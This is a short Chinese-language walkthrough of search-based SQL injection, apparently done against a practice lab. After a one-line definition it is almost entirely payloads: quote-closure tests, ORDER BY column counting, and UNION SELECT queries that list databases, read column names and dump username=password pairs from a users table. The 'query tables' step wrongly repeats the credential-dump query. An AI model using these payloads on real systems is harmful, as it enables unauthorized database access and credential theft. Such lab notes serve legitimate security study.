搜索型注入(Search-Based SQL Injection)是指在搜索框或类似的输入字段中进行SQL注入攻击。这种注入方法利用用户输入直接嵌入到SQL查询中的特性,通过构造恶意输入来操控数据库查询,获取或篡改数据。
输入%看看
那么依旧进行闭合测试
allen' and 1=1--+正常显示
allen' and 1=2 --+没法搜到
然后开始猜字段
allen' order by 1 --+
allen' order by 2 --+
allen' order by 3 --+正常
allen' order by 4 --+unknown
所以为3
开始查询数据库
allen' union select 1,2,(select group_concat(schema_name) from information_schema.schemata) --+
查表
allen' union select 1,2,(select group_concat(username,'=',password) from users) --+
查字段
allen' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='users') --+
接着
查用户名和密码
allen' union select 1,2,(select group_concat(username,'=',password) from users) --+
